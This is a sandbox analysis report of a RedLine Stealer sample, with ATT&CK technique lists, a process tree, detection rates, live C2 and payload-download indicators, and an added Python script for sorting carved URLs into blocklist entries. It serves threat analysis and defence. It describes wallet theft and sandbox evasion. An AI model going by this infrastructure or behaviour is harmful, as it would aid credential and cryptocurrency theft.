Credential Access: OS Credential Dumping1, Input Capture21, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: System Time Discovery11, Account Discovery1, File and Directory Discovery2, System Information Discovery137, Security Software Discovery861, Process Discovery12, Virtualization/Sandbox Evasion551, Application Window Discovery11, System Owner/User Discovery1, Remote System Discovery1, System Network Configuration Discovery1
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
Collection: Archive Collected Data1, Data from Local System3, Screen Capture1, Input Capture21, Clipboard Data2, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer1, Encrypted Channel12, Non-Standard Port11, Non-Application Layer Protocol2, Application Layer Protocol3, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot1, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop

                      Behavior Graph

Behavior Graph ID: 452456. Sample: Nb2HQZZDIf. Start date: 22/07/2021. Architecture: WINDOWS. Score: 100

Signatures on the sample: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected RedLine Stealer; 8 other signatures

Process tree as drawn in the graph:

Nb2HQZZDIf.exe
  Network: iplogger.org (88.99.66.31), ports 443, 49714, HETZNER-ASDE, Germany; is.gd (104.25.233.53), ports 443, 49715, CLOUDFLARENETUS, United States; 4 other IPs or domains
  Dropped file: C:\Users\user\AppData\Roaming\1234.exe (PE32)
  Signatures: Detected unpacking (changes PE section rights); May check the online IP address of the machine; Sample or dropped binary is a compiled AutoHotkey binary
  -> 1234.exe
       Signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Performs DNS queries to domains with low reputation; 2 other signatures
       -> 1234.exe (child process)
            Network: yspasenana.xyz (212.224.105.105), ports 49742, 49744, 49745, DE-FIRSTCOLOwwwfirst-colonetDE, Germany; api.ip.sb; 6 other IPs or domains
            Dropped file: C:\Users\user\AppData\Local\Temp\srvs.exe (PE32)
            Signatures: Tries to steal Crypto Currency Wallets
            -> srvs.exe
                 Network: api.ip.sb; 5.149.255.203, ports 32800, 49751, 49753, HZ-NL-ASGB, United Kingdom
                 Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 8 other signatures
       -> 1234.exe (second child process)

                      Screenshots

Thumbnails of all screenshots from the analysis run (images not reproduced in this text).

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Nb2HQZZDIf.exe | 22% | Virustotal |
Nb2HQZZDIf.exe | 25% | ReversingLabs | ByteCode-MSIL.Infostealer.Reline

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\srvs.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\srvs.exe | 20% | Metadefender |
C:\Users\user\AppData\Local\Temp\srvs.exe | 36% | ReversingLabs | Win32.Trojan.GenCBL
C:\Users\user\AppData\Roaming\1234.exe | 33% | ReversingLabs | ByteCode-MSIL.Infostealer.Reline

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.1.Nb2HQZZDIf.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1142275
15.2.1234.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1140572

                      Domains

Source | Detection | Scanner
yspasenana.xyz | 1% | Virustotal
api.ip.sb | 2% | Virustotal

                      URLs

Source | Detection | Scanner | Label
https://bbuseruploads.s3.amazonaws.com4 | 0% | Avira URL Cloud | safe
http://service.r | 0% | URL Reputation | safe
http://www.fontbureau.comdTF | 0% | Avira URL Cloud | safe
http://ahkscript.org | 1% | Virustotal |
http://ahkscript.org | 0% | Avira URL Cloud | safe
http://yspasenana.xyz/ | 0% | Avira URL Cloud | safe
http://www.fontbureau.comsiv | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip | 0% | URL Reputation | safe
https://api.ip.sbx | 0% | Avira URL Cloud | safe
http://yspasenana.xyz4 | 0% | Avira URL Cloud | safe
http://tempuri.org/ | 0% | Avira URL Cloud | safe
http://ns.adobe.c/g | 0% | URL Reputation | safe
http://www.urwpp.dea( | 0% | Avira URL Cloud | safe
http://yspasenana.xyz:80/ | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
http://www.fontbureau.comalsF | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/: | 0% | URL Reputation | safe
http://www.fontbureau.comap | 0% | Avira URL Cloud | safe
http://www.fontbureau.comk: | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/3 | 0% | URL Reputation | safe
http://www.fontbureau.comueto3 | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/- | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
http://www.fontbureau.comgrito | 0% | URL Reputation | safe
http://yspasenana.xyz(h | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://support.a | 0% | URL Reputation | safe
http://yspasenana.xyz | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/crosU | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/rz | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/U | 0% | URL Reputation | safe
https://bitbucket.org4 | 0% | Avira URL Cloud | safe
http://ns.adobe.cobj | 0% | URL Reputation | safe
http://www.fontbureau.comcomd | 0% | URL Reputation | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://www.fontbureau.comitum | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://www.fontbureau.comica | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnviron | 0% | Avira URL Cloud | safe
http://www.fontbureau.come.com | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.216.94.27 | true | false | | high
yspasenana.xyz | 212.224.105.105 | true | true | | unknown
bitbucket.org | 104.192.141.1 | true | false | | high
iplogger.org | 88.99.66.31 | true | false | | high
is.gd | 104.25.233.53 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
api.ip.sb | unknown | unknown | true | | unknown

                                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://yspasenana.xyz/ | false | Avira URL Cloud: safe | unknown
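Two things in these URL tables trip up anyone building a blocklist from them. First, strings carved from process memory often carry trailing garbage bytes ("https://api.ip.sbx", "http://yspasenana.xyz(h", "https://bbuseruploads.s3.amazonaws.com4"), so the verbatim string is not the indicator. Second, a URL in memory is not evidence of a connection: http://tempuri.org/ is the default namespace WCF assigns to a service contract, and the Endpoint/SetEnvironment, GetUpdates and VerifyUpdate strings under it are SOAP action URIs of the C2 protocol, not hosts; tempuri.org is accordingly absent from the Contacted Domains table. The script below is an added example for this report, not Joe Sandbox's or the sample's code; it reconciles a handful of the page's memory URLs against the Contacted Domains table so the clean host is what reaches the blocklist, and it refuses a prefix match when the leftover contains a dot, since "bitbucket.org.example" is a different host and not carve garbage.

```python
"""Reconcile memory-carved URL strings with the hosts that actually got traffic.

Added example for this sandbox report; not part of Joe Sandbox or of the sample.
Inputs are copied from the page's Contacted Domains and memory-URL tables.
"""
from urllib.parse import urlsplit

# Hosts from the Contacted Domains table, with the resolved IP where the report
# gives one. These are the only hosts confirmed by observed traffic.
CONTACTED = {
    "s3-w.us-east-1.amazonaws.com": "52.216.94.27",
    "yspasenana.xyz": "212.224.105.105",
    "bitbucket.org": "104.192.141.1",
    "iplogger.org": "88.99.66.31",
    "is.gd": "104.25.233.53",
    "bbuseruploads.s3.amazonaws.com": None,
    "api.ip.sb": None,
}

# A subset of "URLs from Memory and Binaries", kept exactly as the report lists them
# (constructed sample input for this example).
MEMORY_URLS = [
    "https://bbuseruploads.s3.amazonaws.com4",
    "https://api.ip.sb/geoip",
    "https://api.ip.sbx",
    "http://yspasenana.xyz(h",
    "http://yspasenana.xyz:80/",
    "https://iplogger.org/1Bwjj7",
    "https://bitbucket.org/luisadoma999/admin/downloads/1234.exe",
    "http://tempuri.org/Endpoint/SetEnvironment",
    "http://www.fontbureau.comdTF",
]


def classify(url: str, contacted=CONTACTED):
    """Return (status, host, garbage) for one carved URL.

    status is "contacted" when the carved host equals, or begins with, a host
    that received traffic; garbage is whatever trailed that host in the carve.
    A leftover containing a dot is treated as a different host, not garbage.
    Anything else is "memory-only" with the carved host returned as-is.
    """
    carved = urlsplit(url).hostname or ""
    if carved in contacted:
        return ("contacted", carved, "")
    # Longest contacted host first, so the most specific prefix wins.
    for host in sorted(contacted, key=len, reverse=True):
        rest = carved[len(host):]
        if carved.startswith(host) and "." not in rest:
            return ("contacted", host, rest)
    return ("memory-only", carved, "")


def triage(urls=MEMORY_URLS, contacted=CONTACTED) -> dict:
    """Group URLs into confirmed network IOCs (keyed by clean host) and memory-only strings."""
    report = {"contacted": {}, "memory-only": []}
    for url in urls:
        status, host, garbage = classify(url, contacted)
        if status != "contacted":
            report["memory-only"].append(url)
            continue
        entry = report["contacted"].setdefault(
            host, {"ip": contacted[host], "urls": [], "garbage": set()})
        entry["urls"].append(url)
        if garbage:
            entry["garbage"].add(garbage)
    return report


if __name__ == "__main__":
    result = triage()
    for host, entry in result["contacted"].items():
        print(f"{host:35} ip={entry['ip']} carve-garbage={sorted(entry['garbage'])}")
    print("memory-only:", result["memory-only"])
```

The memory-only bucket still deserves a look (the bitbucket download path and the iplogger short link are the delivery chain), but it is the contacted bucket, with the garbage stripped, that becomes the network indicator; the font-vendor URLs are .NET font-resource strings and drop out on their own.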

                                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://bbuseruploads.s3.amazonaws.com4 | 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP | srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | false | | high
http://service.r | 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://iplogger.org/1Bwjj7 | Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | false | | high
https://is.gd/ | Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comdTF | 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ahkscript.org | Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://bitbucket.org/luisadoma999/admin/downloads/1234.exe | Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website; | Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmp | false | |
                                              high
                                              http://www.fontbureau.comsiv1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://api.ip.sb/geoip1234.exe, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ip.sbxsrvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://yspasenana.xyz41234.exe, 0000000F.00000002.386040704.0000000002BF7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/soap/envelope/D1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                                high
                                                https://is.gd/dg3E5gS6%Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://tempuri.org/srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226713519.0000000006011000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://ns.adobe.c/g1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlyv1234.exe, 00000002.00000003.220716049.0000000006011000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.urwpp.dea(1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://yspasenana.xyz:80/1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/SetEnvironmentsrvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/SetEnvironmentResponse1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.comalsF1234.exe, 00000002.00000003.221286981.0000000006011000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sajatypeworks.com1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/GetUpdatessrvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.google.com/chrome/?p=plugin_real1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/cThe1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/:1234.exe, 00000002.00000003.216141867.0000000006011000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comap1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.comk:1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bitbucket.org/luisadoma999/admin/downloads/1234.exel:%Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/31234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comueto31234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.interoperabilitybridges.com/wmp-extension-for-chrome1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/74c745b8-de86-1234.exe, 0000000F.00000002.385267737.0000000002B04000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/-1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://support.google.com/chrome/?p=plugin_pdf1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.galapagosdesign.com/DPlease1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/Y01234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://tempuri.org/Endpoint/VerifyUpdate1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.comgrito1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://yspasenana.xyz(h1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              http://www.urwpp.deDPlease1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cn1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://s3-w.us-east-1.amazonaws.com1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://bitbucket.org1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://bbuseruploads.s3.amazonaws.com1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://forms.real.com/real/realone/download.html?type=rpsp_us1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://support.a1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://yspasenana.xyz1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/crosU1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://bitbucket.org/Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#Nb2HQZZDIf.exe, 00000000.00000002.306921781.0000000000968000.00000004.00000020.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.jiyu-kobo.co.jp/rz1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://is.gd/dg3E5gCNb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.galapagosdesign.com/1234.exe, 00000002.00000003.223065732.0000000006011000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://bbuseruploads.s3.amazonaws.com1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exesrvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.jiyu-kobo.co.jp/U1234.exe, 00000002.00000003.216400129.0000000006011000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://support.google.com/chrome/?p=plugin_quicktime1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://bitbucket.org41234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://ns.adobe.cobj1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.comcomd1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://schemas.datacontract.org/2004/07/1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484424033.00000000038B1000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.comitum1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://bitbucket.org1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://bitbucket.org/luisadoma999/admin/downloads/1234.exeuNb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://is.gd/dg3E5g7Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drfalse
                                                                                          high
                                                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sNb2HQZZDIf.exefalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.comica1234.exe, 00000002.00000003.219345969.0000000006011000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://tempuri.org/Endpoint/SetEnviron1234.exe, 0000000F.00000002.386418247.0000000002C65000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.come.com1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226658468.0000000006011000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://is.gd/dg3E5g_6Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://5.149.255.203:3srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.carterandcone.coml | 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.jiyu-kobo.co.jp/; | 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.jiyu-kobo.co.jp/cros | 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
